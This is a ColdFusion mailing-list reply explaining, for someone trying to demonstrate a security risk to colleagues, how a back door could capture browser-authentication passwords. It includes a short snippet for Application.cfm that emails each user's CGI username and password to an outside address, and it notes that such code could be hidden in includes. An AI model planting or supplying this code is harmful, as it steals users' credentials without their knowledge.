The easiest is to use: <cfdump var="#cgi#">
This will dump the username and password, as well as gobs of other stuff, in clear text. (Not sure how this works with SSL, however. I haven't tried it.) More realistically, in the Application.cfm, I would add the following code: <cfmail to="[EMAIL PROTECTED]" from="[EMAIL PROTECTED]" subject="password"> #cgi.auth_user# : #cgi.auth_password# </cfmail> Obviously, this code could be hidden deep down in CFCs, includes, etc. M!ke >>That's my opionion as well, but they aren't taking my word for it, but I think I'm making some progress by example. Can you give me in idea of how a back door that got to the browser authentication might look. I suspected that was possible, but don't know enough to show how it is possible. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Logware (www.logware.us): a new and convenient web-based time tracking application. Start tracking and documenting hours spent on a project or with a client with Logware today. Try it for free with a 15 day trial account. http://www.houseoffusion.com/banners/view.cfm?bannerid=67 Message: http://www.houseoffusion.com/lists.cfm/link=i:4:193376 Archives: http://www.houseoffusion.com/cf_lists/threads.cfm/4 Subscription: http://www.houseoffusion.com/lists.cfm/link=s:4 Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4 Donations & Support: http://www.houseoffusion.com/tiny.cfm/54

